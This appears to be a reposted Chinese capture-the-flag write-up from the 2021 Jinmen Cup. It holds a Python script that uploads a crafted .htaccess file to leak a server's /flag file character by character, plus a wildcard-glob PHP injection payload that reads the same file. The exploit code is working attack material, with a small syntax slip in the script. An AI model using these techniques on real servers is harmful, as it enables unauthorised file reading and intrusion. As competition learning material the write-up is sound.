NU1L-wp学习-津门杯

Posted 2021-06-05 MuRKuo

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了NU1L-wp学习-津门杯相关的知识，希望对你有一定的参考价值。

UploadHub

import requests
import string
import hashlib
ip = requests.get(\'http://118.24.185.108/ip.php\').text
print(ip)
def check(a):
 f = \'\'\'
 <If "file(\'/flag\')=~ /\'\'\'+a+\'\'\'/">
ErrorDocument 404 "wupco"
</If>
 
 resp = requests.post("http://122.112.248.222:20003/index.php?id=167",
data={\'submit\': \'submit\'}, files={\'file\': (\'.htaccess\',f)} )
 a = requests.get("http://122.112.248.222:20003/upload/"+ip+"/a").text
 if "wupco" not in a:
 return False
 else:
 return True
flag = "flag{BN"
c = string.ascii_letters + string.digits + "\\{\\}"
for j in range(32):
 for i in c:
 print("checking: "+ flag+i) 
 if check(flag+i):
 flag = flag+i
 print(flag)
 break
 else:
 continue

payload
http://122.112.214.101:20004/?code=?><?=/???/???%20/????;

以上是关于NU1L-wp学习-津门杯的主要内容，如果未能解决你的问题，请参考以下文章